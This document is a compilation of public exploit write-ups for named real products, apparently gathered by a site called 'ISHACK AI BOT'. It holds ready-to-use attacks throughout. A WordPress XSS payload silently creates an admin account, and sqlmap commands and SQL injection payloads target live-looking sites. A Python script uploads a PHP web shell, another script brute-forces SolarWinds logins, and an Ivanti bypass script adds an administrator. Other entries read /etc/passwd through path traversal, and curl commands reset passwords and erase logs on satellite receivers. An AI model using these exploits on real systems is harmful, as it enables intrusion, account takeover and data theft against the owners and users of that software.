ISHACK AI BOT

# Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated) # Google Dork: inurl:/wp-content/plugins/wp-useronline/ # Date: 2024-06-12 # Exploit Author: Onur Göğebakan # Vendor Homepage: https://github.com/lesterchan/wp-useronline # Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip # Category: Web Application # Version: 2.88.0 # Tested on: WordPress 6.5.4 - Windows 10 # CVE : CVE-2022-2941 # Explanation: A new administrator user can be added to WordPress using a stored XSS vulnerability. # Exploit: 1. Visit http://poc.test/wp-admin/options-general.php?page=useronline-settings 2. Click Save and intercept the request. 3. Change `naming%5Bbots%5D` parameter value with belowed payload ``` %3Cscript%3E+function+handleResponse%28%29+%7B+var+nonce+%3D+this.responseText.match%28%2Fname%3D%22_wpnonce_create-user%22+value%3D%22%28%5Cw%2B%29%22%2F%29%5B1%5D%3B+var+changeReq+%3D+new+XMLHttpRequest%28%29%3B+changeReq.open%28%27POST%27%2C%27%2Fwp-admin%2Fuser-new.php%27%2Ctrue%29%3B+changeReq.setRequestHeader%28%27Content-Type%27%2C%27application%2Fx-www-form-urlencoded%27%29%3B+var+params+%3D+%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%2Bnonce%2B%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%27%2B%27%26user_login%3Dadmin%26email%3Dadmin%2540mail.com%26first_name%3D%26last_name%3D%26url%3D%26pass1%3Dadmin%26pass2%3Dadmin%26pw_weak%3Don%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B+changeReq.send%28params%29%3B+%7D+var+req+%3D+new+XMLHttpRequest%28%29%3B+req.onload+%3D+handleResponse%3B+req.open%28%27GET%27%2C+%27%2Fwp-admin%2Fuser-new.php%27%2C+true%29%3B+req.send%28%29%3B+%3C%2Fscript%3E ``` 4. Payload executed when user visited http://poc.test/wp-admin/index.php?page=useronline 5. Administrator user added with admin:admin credentials. # Decoded payload ``` function handleResponse() { var nonce = this.responseText.match(/name="_wpnonce_create-user" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('POST', '/wp-admin/user-new.php', true); changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); var params = 'action=createuser&_wpnonce_create-user=' + nonce + '&_wp_http_referer=%2Fwp-admin%2Fuser-new.php' + '&user_login=admin&email=admin%40mail.com&first_name=&last_name=&url=&pass1=admin&pass2=admin&pw_weak=on&role=administrator&createuser=Add+New+User'; changeReq.send(params); } var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('GET', '/wp-admin/user-new.php', true); req.send(); ```

# Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3) # Google Dork: inurl:"Powered by Boelter Blue" # Date: 2024-06-04 # Exploit Author: CBKB (DeadlyData, R4d1x) # Vendor Homepage: https://www.boelterblue.com # Software Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_US # Version: 1.3 # Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12 # CVE: CVE-2024-36840 ## Vulnerability Details: ### Description: Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers. Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=10071 AND 4036=4036 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd) Type: UNION query Title: Generic UNION query (NULL) - 44 columns Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - 1. **news_details.php?id** parameter: sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs 2. **services.php?section** parameter: sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs 3. **location_details.php?id** parameter: sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs Impact: Unauthorized access to the database. Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials. Account takeovers and potential full control of the affected application. Discoverer(s)/Credits: CBKB (DeadlyData, R4d1x) References: https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840

# Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution (RCE) # Date: 24-06-2024 # CVE: N/A (Awaiting ID to be assigned) # Exploit Author: Jerry Thomas (w3bn00b3r) # Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip # Github - https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/ # Category: Web Application # Version: 1.0 # Tested on: Windows 10 | Xampp v3.3.0 # Vulnerable endpoint: http://localhost/farm/product.php import requests from colorama import Fore, Style, init # Initialize colorama init(autoreset=True) def upload_backdoor(target): upload_url = f"{target}/farm/product.php" shell_url = f"{target}/farm/assets/img/productimages/web-backdoor.php" # Prepare the payload payload = { 'category': 'CHICKEN', 'product': 'rce', 'price': '100', 'save': '' } # PHP code to be uploaded command = "hostname" data = f"<?php system('{command}');?>" # Prepare the file data files = { 'productimage': ('web-backdoor.php', data, 'application/x-php') } try: print("Sending POST request to:", upload_url) response = requests.post(upload_url, files=files, data=payload, verify=False) if response.status_code == 200: print("\nResponse status code:", response.status_code) print(f"Shell has been uploaded successfully: {shell_url}") # Make a GET request to the shell URL to execute the command shell_response = requests.get(shell_url, verify=False) print("Command output:", Fore.GREEN + shell_response.text.strip()) else: print(f"Failed to upload shell. Status code: {response.status_code}") print("Response content:", response.text) except requests.RequestException as e: print(f"An error occurred: {e}") if __name__ == "__main__": target = "http://localhost" # Change this to your target upload_backdoor(target)

# Exploit Title: Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2024-06-23 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://flatboard.org/ # Version: 3.2 # PoC: 1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum 2-Click Add Forum and write in Information field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)> 3-Save it , you will be payload will be executed

# Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition # CVE: CVE-2024-28999 # Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions # Author: Elhussain Fathy, AKA 0xSphinx import requests import urllib3 import asyncio import aiohttp urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED') # host = '192.168.1.1' # username = "admin" # file_path = "passwords.txt" host = input("Enter the host: ") username = input("Enter the username: ") file_path = input("Enter the passwords file path: ") exploited = 0 url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F" passwords = [] with open(file_path, 'r') as file: for line in file: word = line.strip() passwords.append(word) print(f"Number of tested passwords: {len(passwords)}") headers = { 'Host': host, } sessions = [] for _ in range(len(passwords)): response = requests.get(url, headers=headers, verify=False, stream=False) cookies = response.headers.get('Set-Cookie', '') session_id = cookies.split('ASP.NET_SessionId=')[1].split(';')[0] sessions.append(session_id) async def send_request(session, username, password): headers = { 'Host': host, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Cookie': f'ASP.NET_SessionId={session}; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE', } data = f'__EVENTTARGET=ctl00%24BodyContent%24LoginButton&__EVENTARGUMENT=&__VIEWSTATE=AEQKNijmHeR5jZhMrrXSjzPRqhTz%2BoTqkfNmc3EcMLtc%2FIjqS37FtvDMFn83yUTgHBJIlMRHwO0UVUVzwcg2cO%2B%2Fo2CEYGVzjB1Ume1UkrvCOFyR08HjFGUJOR4q9GX0fmhVTsvXxy7A2hH64m5FBZTL9dfXDZnQ1gUvFp%2BleWgLTRssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3%2F1uhWb8fFc8Mik%3D&__VIEWSTATEGENERATOR=01070692&ctl00%24BodyContent%24Username={username}&ctl00%24BodyContent%24Password={password}' async with aiohttp.ClientSession() as session: async with session.post(url, headers=headers, data=data, ssl=False, allow_redirects=False) as response: if response.status == 302: global exploited exploited = 1 print(f"Exploited Successfully Username: {username}, Password: {password}") async def main(): tasks = [] for i in range(len(passwords)): session = sessions[i] password = passwords[i] task = asyncio.create_task(send_request(session, username, password)) tasks.append(task) await asyncio.gather(*tasks) asyncio.run(main()) if(not exploited): print("Exploitation Failed")

# Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS) # Date: 20-06-2024 # Exploit Author: Jerry Thomas (w3bn00b3r) # Vendor Homepage: https://automad.org # Software Link: https://github.com/marcantondahmen/automad # Category: Web Application [Flat File CMS] # Version: 2.0.0-alpha.4 # Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11 (bullseye) # Description A persistent (stored) cross-site scripting (XSS) vulnerability has been identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker to inject malicious JavaScript code into the template body. The injected code is stored within the flat file CMS and is executed in the browser of any user visiting the forum. This can result in session hijacking, data theft, and other malicious activities. # Proof-of-Concept *Step-1:* Login as Admin & Navigate to the endpoint http://localhost/dashboard/home *Step-2:* There will be a default Welcome page. You will find an option to edit it. *Step-3:* Navigate to Content tab or http://localhost/dashboard/page?url=%2F&section=text & edit the block named ***`Main`*** *Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)> *Request:* POST /_api/page/data HTTP/1.1 Host: localhost Content-Length: 1822 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv Accept: */* Origin: http://localhost Referer: http://localhost/dashboard/page?url=%2F&section=text Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb Connection: close ------WebKitFormBoundaryzHmXQBdtZsTYQYCv Content-Disposition: form-data; name="__csrf__" 49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1 ------WebKitFormBoundaryzHmXQBdtZsTYQYCv Content-Disposition: form-data; name="__json__" {"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS identified by Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br><img src=x onerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"} ------WebKitFormBoundaryzHmXQBdtZsTYQYCv-- *Response:* HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Thu, 20 Jun 2024 19:17:35 GMT Content-Type: application/json; charset=utf-8 Connection: close X-Powered-By: PHP/8.3.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 30` {"code":200,"time":1718911055} *Step-5:* XSS triggers when you go to homepage - http://localhost/

# Exploit Title: Customer Support System 1.0 - (XSS) Cross-Site Scripting Vulnerability in the "subject" at "ticket_list" # Date: 28/11/2023 # Exploit Author: Geraldo Alcantara # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows # CVE : CVE-2023-49976 *Steps to reproduce:* 1- Log in to the application. 2- Visit the ticket creation/editing page. 3- Create/Edit a ticket and insert the malicious payload into the "subject" field/parameter. Payload: <dt/><b/><script>alert(document.domain)</script>

# Exploit Title: Stored XSS in Microweber # Date: 06/18/2024 # Exploit Author: tmrswrr # Vendor Homepage: (https://microweber.me/) # Version: 2.0.15 # Tested on: (http://active.demo.microweber.me/) ## Vulnerability Description A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Microweber version 2.0.15. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. ## Steps to Reproduce 1. Log in to the application. 2. Navigate to `Users > Edit Profile`. 3. In the `First Name` field, input the following payload: "><img src=x onerror=confirm(document.cookie)> 4. Save the changes. 5. Upon visiting any page where the modified user profile is displayed, an alert box will appear, indicating the execution of the injected script.

# Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection # Date: 2024-06-03 # Exploit Author: Buğra Enis Dönmez # Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script # Demo Site: https://azon-dominator.webister.net/ # Tested on: Arch Linux # CVE: N/A ### Request ### POST /fetch_products.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: */* x-requested-with: XMLHttpRequest Referer: https://localhost/ Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8 Content-Length: 79 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112 ### ### Parameter & Payloads ### Parameter: cid (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1) AND 7735=7735 AND (5267=5267 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442 ###

# Exploit Title: xhibiter nft marketplace SQLI # Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs" # Date: 29/06/204 # Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/ # Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA # Version: 1.10.2 # Tested on: linux # CVE : [if applicable] on this dir https://localhost/collections?id=2 xhibiter nft marketplace suffers from SQLI --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa Type: UNION query Title: MySQL UNION query (NULL) - 36 columns Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# ---

# Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service Path # Discovery by: bios # Discovery Date: 2024-15-07 # Vendor Homepage: https://developer.apple.com/bonjour/ # Tested Version: 3,0,0,10 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Home # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Bonjour Service Bonjour Service C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe Auto C:\>systeminfo Host Name: DESKTOP-HFBJOBG OS Name: Microsoft Windows 10 Home OS Version: 10.0.19045 N/A Build 19045 PS C:\Program Files\Blizzard\Bonjour Service> powershell -command "(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion" >> 3,0,0,10 #Exploit: There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe) . This may allow an authorized local user to insert arbitrary code into the unquoted service path and escalate privileges.

# Exploit Title: Ivanti vADC 9.9 - Authentication Bypass # Date: 2024-08-03 # Exploit Author: ohnoisploited # Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller # Software Link: https://hubgw.docker.com/r/pulsesecure/vtm # Version: 9.9 # Tested on: Linux # Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC # Fixed versions: 22.7R2+ import requests # Set to target address admin_portal = 'https://192.168.88.130:9090' # User to create new_admin_name = 'newadmin' new_admin_password = 'newadmin1234' requests.packages.urllib3.disable_warnings() session = requests.Session() # Setting 'error' bypasses access control for wizard.fcgi. # wizard.fcgi can load any section in the web interface. params = { 'error': 1, 'section': 'Access Management:LocalUsers' } # Create new user request # _form_submitted to bypass CSRF data = { '_form_submitted': 'form', 'create_user': 'Create', 'group': 'admin', 'newusername': new_admin_name, 'password1': new_admin_password, 'password2': new_admin_password } # Post request r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False) # View response content = r.content.decode('utf-8') print(content) if r.status_code == 200 and '<title>2<' in content: print("New user request sent") print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'") else: print("Unable to create new user")

# Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path # Date: 2024-07-31 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://www.oracle.com/ # Software Link: https://www.oracle.com/ # Version: 12c Release 1 # Tested on: Windows 10 Pro x64 C:\>sc qc "OracleDBConsoleorcl" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OracleDBConsoleorcl TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OracleDBConsoleorcl DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19045 N/A Build 19045 OS Manufacturer: Microsoft Corporation

# Exploit Title: SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path # Date: 2024-07-31 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://www.kiwisyslog.com/ # Software Link: https://www.kiwisyslog.com/downloads # Version: Software Version 9.6.7.1 # Tested on: Windows 10 Pro x64 1. Description: SolarWinds Kiwi Syslog Server 9.6.7.1 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs 2. Proof C:\>sc qc "Kiwi Syslog Server" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Kiwi Syslog Server TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Syslogd\Syslogd_Service.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Kiwi Syslog Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19045 N/A Build 19045 OS Manufacturer: Microsoft Corporation

#Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path #Exploit Author : SamAlucard #Exploit Date: 2024-07-31 #Vendor : Genexus #Version : Genexus Protection Server 9.7.2.10 #Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;; #Vendor Homepage : https://www.genexus.com/es/ #Tested on OS: Windows 10 Pro #Analyze PoC : ============== C:\>sc qc protsrvservice [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: protsrvservice TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : ProtSrvService DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter # Google Dork: N/A # Date: 2024-06-29 # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/X) # Vendor Homepage: https://devikaai.co/ # Software Link: https://github.com/stitionai/devika # Version: v1 # Tested on: Windows 11 Home Edition # CVE: CVE-2024-40422 #!/usr/bin/python import argparse import requests def exploit(target_url): url = f'http://{target_url}/api/get-browser-snapshot' params = { 'snapshot_path': '../../../../etc/passwd' } response = requests.get(url, params=params) print(response.text) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.') parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True) args = parser.parse_args() exploit(args.target)

# Exploit Title: Stored XSS in Calibre-web # Date: 07/05/2024 # Exploit Authors: Pentest-Tools.com (Catalin Iovita & Alexandru Postolache) # Vendor Homepage: (https://github.com/janeczku/calibre-web/) # Version: 0.6.21 - Romesa # Tested on: Linux 5.15.0-107, Python 3.10.12, lxml 4.9.4 # CVE: CVE-2024-39123 ## Vulnerability Description Calibre-web 0.6.21 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. ## Steps to Reproduce 1. Log in to the application. 2. Upload a new book. 3. Access the Books List functionality from the `/table?data=list&sort_param=stored` endpoint. 4. In the `Comments` field, input the following payload: <a href=javas%1Bcript:alert()>Hello there!</a> 4. Save the changes. 5. Upon clicking the description on the book that was created, in the Book Details, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.

# Exploit Title: Stored XSS Vulnerability via File Name # Google Dork: N/A # Date: 08 Aug 2024 # Exploit Author: Md. Sadikul Islam # Vendor Homepage: https://www.helpdeskz.com/ # Software Link: https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip # Version: v2.0.2 # Tested on: Kali Linux / Firefox 115.1.0esr (64-bit) # CVE : N/A Payload: "><img src=x onerror=alert(1);> Filename can be Payload: "><img src=x onerror=alert(1);>.jpg VIdeo PoC: https://drive.google.com/file/d/1_yh0UsX8h7YcSU1kFvg_bBwk9T7kx1K1/view?usp=drive_link Steps to Reproduce: 1. Log in as a regular user and create a new ticket. 2. Fill out all the required fields with the necessary information. 3. Attach an image file with a malicious payload embedded in the filename. 4. Submit the ticket. 5. Access the ticket from the administration panel to trigger the payload execution. Cross-Site Scripting (XSS) exploits can compromise the administration panel, directly affecting administrators by allowing malicious scripts to execute within their privileged environment.

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.5.179 Revision 904 1.5.56 Revision 884 1.229 Revision 440 Summary: ESE (Elber Satellite Equipment) product line, designed for the high-end radio contribution and distribution market, where quality and reliability are most important. The Elber IRD (Integrated Receiver Decoder) ESE-01 offers a professional audio quality (and composite video) at an excellent quality/price ratio. The development of digital satellite contribution networks and the need to connect a large number of sites require a cheap but reliable and performing satellite receiver with integrated decoder. Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. -------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5820 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd)

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.5.179 Revision 904 1.5.56 Revision 884 1.229 Revision 440 Summary: ESE (Elber Satellite Equipment) product line, designed for the high-end radio contribution and distribution market, where quality and reliability are most important. The Elber IRD (Integrated Receiver Decoder) ESE-01 offers a professional audio quality (and composite video) at an excellent quality/price ratio. The development of digital satellite contribution networks and the need to connect a large number of sites require a cheap but reliable and performing satellite receiver with integrated decoder. Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5821 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc.

